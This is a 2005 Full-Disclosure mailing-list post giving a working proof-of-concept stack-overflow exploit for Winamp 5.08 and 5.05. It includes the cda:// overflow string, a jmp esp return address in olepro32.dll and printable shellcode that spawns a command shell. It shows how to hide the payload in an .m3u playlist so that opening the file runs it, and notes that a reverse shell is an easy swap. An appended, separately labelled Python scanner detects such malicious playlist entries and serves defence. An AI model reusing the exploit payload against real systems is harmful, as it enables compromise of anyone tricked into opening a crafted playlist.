Subject: [Full-Disclosure] Winamp Exploit (POC) 5.08 Stack Overflow
Date: Fri, 28 Jan 2005 13:22:55 +0100
Hello :)

I've coded an exploit for this vulnerability, using the advisory "NSFOCUS 
SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name" as a guide. 
The advisory is very good, so it's very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ

should spawn a shell on WinXP SP1 with Winamp 5.08. I have used as the offset 
0x5f20546e in olepro32.dll, a "jmp esp" (nT _).

?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ is the scode in "printable" chars.

I wrote the scode some time ago, at http://foro.elhacker.net. It's a very, very 
simple scode, with a hardcoded system() call (I'm a noob, sorry xD).

I have used AAAABBBBCCCC... to see how big the buffer is, and to see where the 
ret is overflowed (in 5.08, exactly at HIII).

In Winamp 5.05 the same code works, but the ret is at "IIII", so the exploit must 
have another "H":

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT _IJJJ?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ

Then the exploit works fine in Winamp 5.05 and spawns a shell :)

I have only tested it on 5.08 and 5.05, but I think that it's easy to "port" the 
exploit to another version.

These codes can be saved in an m3u-type file (a Winamp playlist file).

If you copy these codes into a text file like this (Winamp 5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ

(for example, I have used the "demo" file, DJ Mike Llama, and edited the PLAYLIST 
ENTRY)

and save it as a *.m3u file, if you open this (in this case, I repeat, with Winamp 
5.08), a cmd shell will appear :)

It's trivial to change the shellcode to make a bindport, reverse shell, etc.

Sorry about my bad English, I'm Spanish :)            (Spain exists :D)

Greets to http://www.elhacker.net and http://foro.elhacker.net and all the people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards. 

Rojodos

rojo2_bugtraq@yahoo.es
2005-01-28

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
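Added here as a defender-side illustration, not part of Rojodos's post or of Winamp: a small Python scanner that parses an Extended M3U playlist and flags cda:// entries whose device-name portion is far longer than a drive letter or contains non-printable bytes, the two traits of the malicious playlist above. The cda://<device>,<track> split, the 8-byte threshold and the sample playlist are assumptions/constructed for the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Assumption: a Winamp CD entry looks like cda://<device>,<track>; the post's
# overflow lives entirely in the <device> part, which is normally a drive letter.
CDA_ENTRY = re.compile(r"^cda://(?P<device>[^,]*)(?:,(?P<track>.*))?$", re.IGNORECASE)

# Assumed threshold: the post shows the saved return address being reached after
# 31 (5.08) or 32 (5.05) bytes of device name, so 8 bytes is already generous.
MAX_DEVICE_NAME = 8


@dataclass
class Finding:
    line_no: int
    reason: str
    entry: str


def scan_m3u(text: str) -> list[Finding]:
    """Return one Finding per suspicious trait of each cda:// entry in an M3U."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):      # #EXTM3U / #EXTINF metadata
            continue
        match = CDA_ENTRY.match(line)
        if match is None:                         # plain file paths, other URIs
            continue
        device = match.group("device")
        if len(device) > MAX_DEVICE_NAME:
            findings.append(Finding(line_no, f"device name is {len(device)} bytes", line))
        if any(not 0x20 <= ord(ch) <= 0x7E for ch in device):
            findings.append(Finding(line_no, "non-printable bytes in device name", line))
    return findings


# Constructed sample modelled on the playlist in the post. "RRRR" stands in for
# the return address and the 0xC6/0xFF bytes for the shellcode; none of it is
# the original payload.
OVERLONG_DEVICE = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHH" + "RRRR" + "\xc6\xff" * 4
SAMPLE_M3U = (
    "#EXTM3U\n"
    "#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro\n"
    f"cda://{OVERLONG_DEVICE}\n"
    "#EXTINF:180,Constructed Artist - Benign CD track\n"
    "cda://D,1\n"
)

if __name__ == "__main__":
    for f in scan_m3u(SAMPLE_M3U):
        print(f"line {f.line_no}: {f.reason}")
```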
